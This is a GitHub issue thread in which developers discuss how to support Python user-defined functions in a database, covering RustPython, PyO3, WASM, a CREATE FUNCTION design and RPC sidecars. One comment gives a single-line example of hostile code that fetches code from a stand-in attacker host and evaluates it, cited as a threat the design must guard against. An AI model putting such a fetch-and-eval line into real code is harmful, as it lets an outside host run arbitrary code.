Python UDF Support #3777

tisonkun · 2024-04-23T07:08:32Z

What problem does the new feature solve?

This supersedes:

We'd revisit the support for Python UDF. Currently, it suffers with the following challenges:

It's somewhat a hacky solution that we use sql="..." in decorator args for inputs. Ideally, we should build a solution like PL/Python in Postgres to describe the args and return types, as well as embedded scripts, instead of depending on a series of random conventions.
The upstream RustPython doesn't support GC yet, and thus, we can hardly catch up with the upstream, which is evolving quickly.
It's still undetermined how to support multiple Python versions with the PyO3 backend.

What does the feature do?

There are several tasks we can do to improve the situation:

Move forward (READY FOR REVIEW)Garbage collect: A stop-the-world cycle collector RustPython/RustPython#4180 and then upgrade RustPython to the latest version.
Investigate supporting multiple Python versions with the PyO3 backend.
Investigate the distribution model when enabling the PyO3 backend by default.

For supporting multiple Python versions with the PyO3 backend, here are several related threads:

The text was updated successfully, but these errors were encountered:

tisonkun · 2024-05-15T09:04:19Z

@discord9 Now I'd prefer to keep the pyo3 feature gate but drop the RustPython support. And thus the default binary doesn't support Python scripting at all. It seems quite subtle and challenging to handle host Python environment in our distribution.

We may still need a design for the whole Python UDF with this distribution decision. And the current script table solution can suck from #2510.

sundy-li · 2024-05-17T03:08:31Z

We have also encountered this issue in databendlabs/databend#15494 via pyo3.

Dynamic lib link is unacceptable in distribution release.

Maybe we can build the python codes into wasm?

https://wasmer.io/posts/py2wasm-a-python-to-wasm-compiler
https://gregoryszorc.com/docs/pyoxidizer/main/pyembed.html

tisonkun · 2024-05-20T16:27:22Z

@sundy-li Thanks for participating in this thread.

I'm afraid that employing the WASM solution would be nothing better than the RustPython solution, both of which can ship the basic Python support without linkage issues.

However, the major use cases of Python UDF are to integrate with the board scientific computing (scipy), data analyzing (numpy, pandas), and ML/AI ecosystem. All of them require a full CPython environment as well as its (C) extension support.

In the last weekend, I made a draft proposal that, at least in GreptimeDB, we can implement Python UDFs with:

Support CRAETE FUNCTION syntax. A demo can be:

CREATE FUNCTION udf_name(arg0 [opt_ty0], ...)
RETURNS (ret0 [opt_ty0], ...) AS 
$$
...
$$
LANGUAGE python3;

Run a CreateFunctionProcedure to register the UDF to the FUNCTION_REGISTRY, and also update the global scripts table.
Then, leverage the current UDF framework to support querying Python UDF as normal UDF.

We will still have a feature pyo3_backend or sth. similar so that whether the Python UDF is able to run is determined at runtime.

Upon failures, a new server will load the scripts table and register all the UDFs on restarted. Other nodes will be notified on the new UDF registered the same as the new table created following the meta server pub-sub mechanism.

In this way, we don't need the "script engine" and the whole HTTP endpoints at all and fully employ the SQL standards. Thus, we can avoid a lot of confusions and unalignments we found previously (#2434 #2532).

Open questions

Following PG's CREATE FUNCTION docs, functions are registered per schema scoped and can be restricted with the permission model. But in our first version, we can use a globally shared scripts table, and later break it down per schemas (or add a schema column to describe its owner/scope).

Zheaoli · 2024-05-21T17:50:05Z

Maybe we can build the Python codes into wasm?

WASM is a very bad idea. I have tried something like this before in similar circumstance(Gateway UDF/Custom Plugin)

Python has official WASM support but is still in the experimental phase. By the way, if you choose WASM, you will drop most of the C extension support defaults.

The challenges of the Python UDF in my mind are following below:

The Python interpreter version supports; how do you choose the Python version you support?
How do you install your own package?
The resource restricts, and the evil code protects eval(requests.get("https://evil.com").text)

In my old experience, Many Gateway developers and me choose to use the RPC as the solution

We provide a series SDK or official docker image. People run the image/SDK code their own
We register the RPC endpoint like CREATE UDF ENDPOINT 'abc.abc.com'
People can run the customize code their own.

sundy-li · 2024-05-21T23:47:31Z

In my old experience, Many Gateway developers and me choose to use the RPC as the solution

Yes, we have external function to work this way. It works, but it's not efficient because we need to pass the argument column through the rpc network.

seems snowpark is a sidecar container.

This was referenced Apr 23, 2024

Upgrade rustpython #3063

Closed

refactor!: drop RustPython support #3749

Closed

fix: dynamically get python udf from scripts table #3774

Closed

tisonkun added the help wanted Extra attention is needed label Apr 23, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Python UDF Support #3777

Python UDF Support #3777

tisonkun commented Apr 23, 2024 •

edited

Loading

tisonkun commented May 15, 2024

sundy-li commented May 17, 2024 •

edited

Loading

tisonkun commented May 20, 2024 •

edited

Loading

Zheaoli commented May 21, 2024

sundy-li commented May 21, 2024 •

edited

Loading

Python UDF Support #3777

Python UDF Support #3777

Comments

tisonkun commented Apr 23, 2024 • edited Loading

What problem does the new feature solve?

What does the feature do?

tisonkun commented May 15, 2024

sundy-li commented May 17, 2024 • edited Loading

tisonkun commented May 20, 2024 • edited Loading

Open questions

Zheaoli commented May 21, 2024

sundy-li commented May 21, 2024 • edited Loading

tisonkun commented Apr 23, 2024 •

edited

Loading

sundy-li commented May 17, 2024 •

edited

Loading

tisonkun commented May 20, 2024 •

edited

Loading

sundy-li commented May 21, 2024 •

edited

Loading